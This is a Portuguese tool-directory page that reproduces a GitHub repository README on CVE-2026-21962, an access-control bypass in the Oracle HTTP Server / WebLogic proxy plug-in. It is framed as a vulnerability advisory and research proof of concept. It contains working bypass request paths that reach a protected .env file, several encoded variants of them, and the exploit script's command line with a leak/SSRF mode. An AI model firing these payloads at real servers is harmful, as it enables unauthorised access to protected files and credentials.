Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/zeetee1235/cve-2026-21962
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoRed Teaming
GitHubzeetee1235/cve-2026-21962

CVE-2026-21962

PoC verificado e análise para CVE-2026-21962, uma bypass de controle de acesso no Oracle HTTP Server/WebLogic Proxy Plug-in por meio de inconsistência na normalização de URI, com script de exploit e evidências.

Ver Repositório
há 12h 23mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-21962 — Oracle HTTP Server / WebLogic Server Proxy Plug-in

Bypass de Controle de Acesso via Inconsistência na Normalização de URI

Uma exploração e análise reproduzida de forma independente para CVE-2026-21962 (controle de acesso inadequado, CVSS 10.0) no Oracle HTTP Server / no Oracle WebLogic Server Proxy Plug-in para Apache HTTP Server.

Status: verificado contra OHS 12.2.1.4.0 e 14.1.2.0.0 ativos em produção servindo WebLogic Server 12.2.1.4.


1. Resumo

O front-end (OHS + mod_wl_ohs) e o backend (WebLogic) normalizam ..; de forma diferente. Uma requisição como:

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1

contorna uma regra de proteção <Location /internal-admin> do front-end porque o OHS não colapsa ..;, enquanto o WebLogic colapsa (; = parâmetro de caminho do servlet, .. = diretório pai). O backend então serve o caminho protegido. Resultado: bypass de controle de acesso no front-end (CWE-284).

Consulte analysis/root-cause.md.

2. Escopo — exatamente o que foi verificado

Verificado (reproduzido)

  • OHS 12.2.1.4.0 + mod_wl_ohs (WLSPLUGINS_12.2.1.4.0_LINUX.X64_190912.1848) servindo WebLogic Server 12.2.1.4.
  • OHS 14.1.2.0.0 + mod_wl_ohs (WLSPLUGINS_14.1.2.0.0_LINUX.X64_250908.1137) servindo WebLogic Server 12.2.1.4.
  • Variantes de bypass (todas vazam o .env protegido):
    • /foo/..;/internal-admin/cont/.env
    • /foo/..%3b/internal-admin/cont/.env
    • /foo/..;jsessionid=xxxx/internal-admin/cont/.env
    • /foo/%2e%2e;/internal-admin/cont/.env
  • O caminho direto (canônico) é bloqueado (404), comprovando o bypass.
  • A resposta carrega cabeçalhos X-ORACLE-DMS-*, comprovando que é uma resposta genuína do backend (WebLogic).
  • O log de acesso do backend mostra a requisição normalizada para ().

NÃO verificado

  • WebLogic Server Proxy Plug-in para IIS (isapi_wl, afetado na 12.2.1.4.0). O mesmo mecanismo é esperado (resolução de caminho de servlet no backend), mas não foi reproduzido no Windows.
  • Os binários oficiais corrigidos (protegidos por SSO da Oracle). A análise do patch é um diff binário de duas builds públicas vulneráveis + uma demonstração equivalente a patch (analysis/patch-analysis.md).
  • Qualquer cadeia de RCE além de divulgação de dados / SSRF. Este projeto demonstra um bypass de controle de acesso com vazamento de dados e um cenário de preparação para SSRF; ele não demonstra execução de comandos do sistema operacional, e nenhum PoC público confiável também o faz.

3. Ambiente

Configuração do front-end usada (gatilho mínimo):

root@kitploit:~
<Location /foo>
  WLSRequest ON
  WebLogicCluster <backend>:7101
</Location>

<Location /internal-admin>
  ErrorDocument 404 'OHS: Disallowed location'
  Redirect 404 /
</Location>

4. Vulnerável vs Corrigido (A/B)

Mesma requisição, mesmo front-end, mesmo backend — apenas o tratamento de ..; no front-end é alterado.

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1
implantaçãoHTTPvazoubackend alcançado
vulnerável200

Evidências brutas (requisição / resposta / logs do servidor):

  • evidence/vulnerable/
  • evidence/patched/

5. Uso

root@kitploit:~
python3 exploit/CVE-2026-21962.py -t http://TARGET:PORT --auto-proxy --check ALL
  • --auto-proxy : detecta automaticamente o prefixo de proxy WLSRequest (ex.: /foo).
  • -c : caminho protegido no backend (padrão internal-admin/cont/.env).
  • --check LEAK|SSRF|ALL.
  • A verificação da resposta do backend usa cabeçalhos X-ORACLE-DMS-*; a requisição de controle (direta) deve ser bloqueada para que o veredito seja positivo.

Consulte exploit/README.md para detalhes. Use apenas contra sistemas nos quais você tem autorização para testar.

6. Arquivos

root@kitploit:~
.
├── README.md                     este arquivo
├── exploit/
│   ├── CVE-2026-21962.py         PoC verificado (verificação determinística de vazamento)
│   └── README.md
├── evidence/
│   ├── vulnerable/               request.txt, response.txt, server-log.txt
│   └── patched/                  request.txt, response.txt, server-log.txt
├── analysis/
│   ├── root-cause.md             análise da incompatibilidade de normalização
│   └── patch-analysis.md         diff binário + A/B equivalente a patch
└── poc-factcheck.md              tabela de credibilidade de PoCs públicos + detalhe por PoC

Ferramentas ativas de detecção / mapeamento (fingerprint, sonda cega, mapa de normalização) que funcionam SEM conhecer um caminho protegido são mantidas separadamente em ../../probe/.

Integridade

  • exploit/CVE-2026-21962.py SHA-256: 20f050abf2a8f0e5b644667c1f7f87bcd9b2448d03b8d5d89bd6ea71b6b4f75a

7. Referências

  • Oracle CPU (Jan 2026): https://www.oracle.com/security-alerts/cpujan2026.html
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21962
  • CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21962
  • Pesquisador original: https://github.com/gregk4sec/cve-2026-21962

8. Uso responsável

Este material é fornecido para pesquisa de vulnerabilidades e validação defensiva. Não use contra sistemas sem autorização. O conteúdo do .env nas evidências é fictício; nenhuma credencial real está incluída.

Baixar ferramenta
/internal-admin/...
GET /foo/../internal-admin/... 200
  • A/B equivalente a patch: com a normalização do front-end corrigida, a mesma requisição é bloqueada (consulte evidence/).
  • URIs da família Ashwesker de "RCE" retornam 404 na mesma implantação vulnerável (consulte poc-factcheck.md).
  • papelcomponenteversão
    front-endOracle HTTP Server12.2.1.4.0 / 14.1.2.0.0
    plug-inmod_wl_ohs12.2.1.4 (190912) / 14.1.2 (250908)
    backendOracle WebLogic Server12.2.1.4
    aplicação protegida/internal-admin/cont/.env (credenciais fictícias)—
    sim (credenciais .env)
    sim (X-ORACLE-DMS-*)
    corrigida (normalização corrigida)404nãonão